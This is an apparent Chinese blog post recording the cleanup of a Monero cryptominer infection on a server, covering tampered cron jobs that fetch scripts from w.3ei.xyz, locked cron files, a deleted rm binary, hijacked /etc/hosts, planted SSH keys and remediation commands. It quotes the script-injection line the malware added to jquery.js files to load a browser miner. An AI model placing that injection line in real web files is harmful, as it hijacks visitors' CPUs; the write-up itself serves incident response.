服务器又又被挖矿之解决记录

服务器又又被挖矿了。。。
top 看了一下，有个 cncq 的进程把 CPU 跑满了。直接上解决过程。

初步分析

crontab -e 查看定时任务，发现定时任务已被篡改。有两项是定时下载并执行 shell 命令。
wget 将 两个 sh 文件下载，后续进行分析。

屏蔽 IP

通过分析定时任务，发现会定时下载并执行 shell 命令，为防止重复执行，先将对方 ip 进行屏蔽。
ping http://w.3ei.xyz 得出对方 ip 为 111.62.24.216
服务器为阿里云服务器，直接通过阿里云的安全组屏蔽出网ip。

删除定时任务

crontab -e 编辑删除所有定时任务。发现提示我无权限，已用 root 用户。
使用 lsattr /var/spool/cron/root 查看sia属性
chattr -isa /var/spool/cron/root 去除 sia 属性
crontab -e 编辑删除所有定时任务

kill 进程

top 查看 cncq 进程 id
ll /proc/[进程 id] 查看进程目录
exe -> /etc/cncq 为进程的执行目录
rm -rf /etc/cncq
kill - 9 [进程 id]

删除文件

通过分析下载的 shell 脚本，删除以下文件:
rm /tmp/crloger1
rm /tmp/v2
rm /etc/cncq
rm /var/spool/cron/crontabs/root
``
在删除文件时，发现 rm 命令没有了。查看了/bin 下，rm 被删除了。从别的服务器上 copy 了一个rm 文件，设置权限，就可以了。

/etc下文件修复

在 /etc 下，查看文件修改时间，发现有若干文件添加和被修改，有部分文件无用，直接删除即可。
vim /etc/hosts 发现一堆域名指向，看了一下，是什么门罗币。被挖矿确认无疑。修改为以下内容即可。

127.0.0.1       localhost localhost.localdomain
::1     localhost localhost.localdomain

清空文件 /etc/cron.d/root

删除可疑authorized_keys

vim .ssh/authorized_keys
查看是否有可疑key ，删除，如遇权限问题 chattr 命令解决。

修复 js 文件

通过脚本分析，对方会在所有查找所有jquery.js文件，并在文件中添加内容：
'\document.write\('\'\<script\ src=\"http://t.cn/EvlonFh\"\>\</script\>\<script\>OMINEId\(\"e02cf4ce91284dab9bc3fc4cc2a65e28\",\"-1\"\)\</script\>\'\)\;
会导至所有web访问者的电脑cpu跑满，无法使用服务。
反其道：
find / -name 'jquery*.js'|xargs grep -L f4ce9|xargs sed -i '/e02cf4ce91284dab9bc3fc4cc2a65e28/d'
删除所有 jquery.js 中带e02cf4ce91284dab9bc3fc4cc2a65e28 的行。

最后，在此清明佳节之时，祝 w.3ei.xyz 所有者，清明快乐。